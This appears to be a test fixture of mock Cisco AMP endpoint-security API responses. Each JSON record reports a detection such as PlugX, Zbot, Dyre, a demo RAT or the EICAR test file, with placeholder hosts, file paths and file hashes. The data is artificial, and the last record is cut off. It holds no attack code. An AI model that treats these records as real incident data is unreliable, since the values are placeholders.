-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255523898262000,"timestamp":1610705029,"timestamp_nanoseconds":26000000,"date":"2021-01-15T10:03:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255523898261522","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055260891349000,"timestamp":1610705028,"timestamp_nanoseconds":744000000,"date":"2021-01-15T10:03:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055260891349000","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055248006447000,"timestamp":1610705025,"timestamp_nanoseconds":103000000,"date":"2021-01-15T10:03:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055248006447111","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1j4","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1j4","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":119000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512518","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":72000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512517","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055222236643000,"timestamp":1610705019,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:03:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055222236643332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1uc","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1uc","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055217941676000,"timestamp":1610705018,"timestamp_nanoseconds":243000000,"date":"2021-01-15T10:03:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055217941676035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255468063687000,"timestamp":1610705016,"timestamp_nanoseconds":920000000,"date":"2021-01-15T10:03:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255468063686673","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255420819046000,"timestamp":1610705005,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:03:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255420819046416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395959000600,"timestamp":1610704997,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Win32.DemoMal.Rat.Client","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704997,"start_date":"2021-01-15T10:03:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900"},"parent":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906501425758000,"timestamp":1610704994,"timestamp_nanoseconds":771000000,"date":"2021-01-15T10:03:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906501425758211","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255369279439000,"timestamp":1610704993,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255369279438863","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906497130791000,"timestamp":1610704993,"timestamp_nanoseconds":662000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906497130790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX0\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":428,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395608001000,"timestamp":1610704992,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:03:12+00:00","event_type":"Adobe Reader compromise","event_type_id":1107296261,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704992,"start_date":"2021-01-15T10:03:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"},"parent":{"disposition":"Clean","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266559459951000,"timestamp":1610704979,"timestamp_nanoseconds":950000000,"date":"2021-01-15T10:02:59+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5832266559459950593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":25939,"local_ip":"10.10.0.0","local_port":15322,"nfm":{"direction":"Outgoing connection from","protocol":"UDP"},"parent":{"process_id":1512,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":701000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408458","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408457","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":451000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408456","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266495035441000,"timestamp":1610704964,"timestamp_nanoseconds":482000000,"date":"2021-01-15T10:02:44+00:00","event_type":"Threat 